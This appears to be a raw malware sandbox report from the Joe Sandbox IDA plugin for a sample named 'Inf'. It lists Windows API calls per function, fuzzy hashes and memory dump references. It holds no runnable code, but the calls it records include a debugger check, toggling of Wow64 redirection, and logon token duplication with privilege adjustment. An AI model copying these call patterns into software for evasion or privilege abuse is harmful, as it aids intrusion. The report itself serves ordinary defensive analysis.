                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A15851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A155D1,?,?,00A54B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00A15871
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A13A57: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00A13A76
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Name$Path$FileFullLongOpen
                                                                                                                                                                                                                                                                                                    • String ID: X
                                                                                                                                                                                                                                                                                                    • API String ID: 779396738-3081909835
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00A13A3C
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: IconNotifyShell_
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1144537725-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • IsThemeActive.UXTHEME ref: 00A1333D
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A132E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00A132FB
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A132E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00A13312
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00A13368,?), ref: 00A133BB
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00A13368,?), ref: 00A133CE
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,00AE2418,00AE2400,?,?,?,?,?,?,00A13368,?), ref: 00A1343A
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1338B: SetCurrentDirectoryW.KERNEL32(?,00000001,00AE2418,?,?,?,?,?,?,?,00A13368,?), ref: 00A134BB
                                                                                                                                                                                                                                                                                                    • SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00A13377
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1550534281-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 00A1CEEE
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1385522511-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 7ff79ddff37878ae580725f430a3e6dd2d2e7dacb4f88fe02007c217b89e4a49
                                                                                                                                                                                                                                                                                                    • Instruction ID: 246896dea34f7c4ac6a02803bcb0524683691bd853dd61ec5b05dc5ae0d7785b
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7ff79ddff37878ae580725f430a3e6dd2d2e7dacb4f88fe02007c217b89e4a49
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D632BE75A44255AFCF20CF58C884EFABBB5FF44364F188069E916AB251D734ED81CB90
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: LoadString
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2948472770-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 3fccb8b0bf1a47a9d1596c18076e8b390cece7d9771b62e44e00b1ec38ce02a7
                                                                                                                                                                                                                                                                                                    • Instruction ID: 8e4928c4afb6cd0a86680ea1e0f92b5bf167d0d2e02633d903df8c3a8e15586c
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3fccb8b0bf1a47a9d1596c18076e8b390cece7d9771b62e44e00b1ec38ce02a7
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 28D14B75A1420AEFCF14EF98D9819EDBBB5FF48310F144159E915AB291DB30AE81CFA0
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                    • Opcode ID: 68ffcf9c8cf082988dbe3a8a66e2181d0174e0868f2c7ee5c25de64d1abf8046
                                                                                                                                                                                                                                                                                                    • Instruction ID: 9cd2fb71544eeacbe7d2ec6da731b328384582880002be1bf92a51de44c63c02
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 68ffcf9c8cf082988dbe3a8a66e2181d0174e0868f2c7ee5c25de64d1abf8046
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E751B675E10144EFDB10DFA8D841EAA7BB1EF85364F198168F8189B392D731ED42CB90
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CharLowerBuffW.USER32(?,?), ref: 00A7FCCE
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: BuffCharLower
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2358735015-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 50dd487ec1a84e7fa6c357f2a5c69a2b998a16dd5733a7b670afe8c81f4eee50
                                                                                                                                                                                                                                                                                                    • Instruction ID: 721037cc2782e6ec47c7b5b72c919518db99629fb6bb7ef5ed4ec63f8ee924f3
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 50dd487ec1a84e7fa6c357f2a5c69a2b998a16dd5733a7b670afe8c81f4eee50
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0E419276500209AFCB21EFA8CC819AEB7F9EF44314B20C53AE91AD7251EB70DB458B50
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00A1668B,?,?,00A162FA,?,00000001,?,?,00000000), ref: 00A1664A
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00A1665C
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1663E: FreeLibrary.KERNEL32(00000000,?,?,00A1668B,?,?,00A162FA,?,00000001,?,?,00000000), ref: 00A1666E
                                                                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00A162FA,?,00000001,?,?,00000000), ref: 00A166AB
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A16607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00A55657,?,?,00A162FA,?,00000001,?,?,00000000), ref: 00A16610
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A16607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00A16622
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A16607: FreeLibrary.KERNEL32(00000000,?,?,00A55657,?,?,00A162FA,?,00000001,?,?,00000000), ref: 00A16635
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Library$Load$AddressFreeProc
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2632591731-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 8ac324affc3f13bb9c19852072c8a693b4e0dd6f1b4f4b47f50423fcadec1cd9
                                                                                                                                                                                                                                                                                                    • Instruction ID: 603a675c29afb2c0df48eac6a2cc78cfe2ef3dcb7b09b92f9d5d9e0b85dd3cb6
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8ac324affc3f13bb9c19852072c8a693b4e0dd6f1b4f4b47f50423fcadec1cd9
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4411C172600205AACF18EB70CA02BEDBBA5AF50711F10482DF492E61C2EEB59A85DB50
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: __wsopen_s
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3347428461-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A44FF0: RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,00A4319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00A45031
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A453DF
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: AllocateHeap_free
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 614378929-0
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _wcslen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 176396367-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,00A4319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00A45031
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,?,?,00A36A79,?,0000015D,?,?,?,?,00A385B0,000000FF,00000000,?,?), ref: 00A43BC5
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: e639faa5a9b42d2df594e9882e6cd855c704744e68248c169ee37dc1989e3c1a
                                                                                                                                                                                                                                                                                                    • Instruction ID: fbb09e9632e099f4b38c9bc5824cf76f20de327324a4cb3b8322cb8a8b090e3d
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e639faa5a9b42d2df594e9882e6cd855c704744e68248c169ee37dc1989e3c1a
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8DE06D3BA50621A6DE2177B69C02B9B3A5CEF813A0F150161FC659EA91DB60CE4286A1
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                    • Opcode ID: 52fb14d83e7456480f2b2d3da2eed8f65f1fb53883c9d69b62fb7a4912749c0c
                                                                                                                                                                                                                                                                                                    • Instruction ID: db50e511969ffb94f04a0d0dde540980ec95a7a318298c0fc54633ca27e91867
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 52fb14d83e7456480f2b2d3da2eed8f65f1fb53883c9d69b62fb7a4912749c0c
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EFF0A9B0400702CFCB348F64D8A0892BBF0BF0432A3248A7EE5D786A10C7329884DF10
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ClearVariant
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1473721057-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: f92c959493914d00e52e6a6e9994a39c64679280ec88806a534dd01adc521018
                                                                                                                                                                                                                                                                                                    • Instruction ID: dd0c2ff1f6f6e815937b26536551e9e9414975b65e6ad25795e2f3babe1ea019
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f92c959493914d00e52e6a6e9994a39c64679280ec88806a534dd01adc521018
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 83F0EDB1704601AAE7208BA8A809BA1FBF8BB21314F14462EE4D582181D7B254D497A2
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: __fread_nolock
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2638373210-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                                                                                                                                                                                                                                    • Instruction ID: 729145ea618b69a07172406a5a97b8479165a50d5097fbed13df220b1c478b92
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B9F0D47550020DFBDF05DF90C941A9E7B79FB08318F208445F9159A151C336EA61ABA1
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00A13963
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: IconNotifyShell_
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1144537725-0
APIs
• GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00A13A76
  • Part of subcall function 00A18577: _wcslen.LIBCMT ref: 00A1858A
Memory Dump Source
• Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
Similarity
• API ID: LongNamePath_wcslen
• String ID:
• API String ID: 541455249-0
APIs
• CreateFileW.KERNEL32(00000000,00000000,?,00A50A84,?,?,00000000,?,00A50A84,00000000,0000000C), ref: 00A50737
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
APIs
• GetFileAttributesW.KERNEL32(?,00A7D840), ref: 00A7EAB1
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
APIs
  • Part of subcall function 00A7DC54: FindFirstFileW.KERNEL32(?,?), ref: 00A7DCCB
  • Part of subcall function 00A7DC54: DeleteFileW.KERNEL32(?,?,?,?), ref: 00A7DD1B
  • Part of subcall function 00A7DC54: FindNextFileW.KERNELBASE(00000000,00000010), ref: 00A7DD2C
  • Part of subcall function 00A7DC54: FindClose.KERNEL32(00000000), ref: 00A7DD43
• GetLastError.KERNEL32 ref: 00A8666E
Similarity
• API ID: FileFind$CloseDeleteErrorFirstLastNext
• String ID:
• API String ID: 2191629493-0
APIs
  • Part of subcall function 00A72010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00A7205A
  • Part of subcall function 00A72010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00A72087
  • Part of subcall function 00A72010: GetLastError.KERNEL32 ref: 00A72097
• LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00A71BD2
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00A71BF4
• CloseHandle.KERNEL32(?), ref: 00A71C05
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00A71C1D
• GetProcessWindowStation.USER32 ref: 00A71C36
• SetProcessWindowStation.USER32(00000000), ref: 00A71C40
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00A71C5C
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A71A0B: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00A71B48), ref: 00A71A20
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A71A0B: CloseHandle.KERNEL32(?,?,00A71B48), ref: 00A71A35
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                                                                                                                                                                                                                                    • String ID: $default$winsta0
                                                                                                                                                                                                                                                                                                    • API String ID: 22674027-1027155976
                                                                                                                                                                                                                                                                                                    • Opcode ID: 8a3c31283f0746403c9b969162f983f9148b16b0f5e4f78d23ae07bfaa96a212
                                                                                                                                                                                                                                                                                                    • Instruction ID: 2cc7a21663a857cae48597cbcd7d94028d36cc334305269694ee6de1e108fcf5
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8a3c31283f0746403c9b969162f983f9148b16b0f5e4f78d23ae07bfaa96a212
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E4816A71900209ABDF21DFA8DD49FEE7BB8EF05301F148129F959A61A1E7318A46CB60
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A71A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00A71A60
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A71A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00A714E7,?,?,?), ref: 00A71A6C
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A71A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00A714E7,?,?,?), ref: 00A71A7B
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A71A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00A714E7,?,?,?), ref: 00A71A82
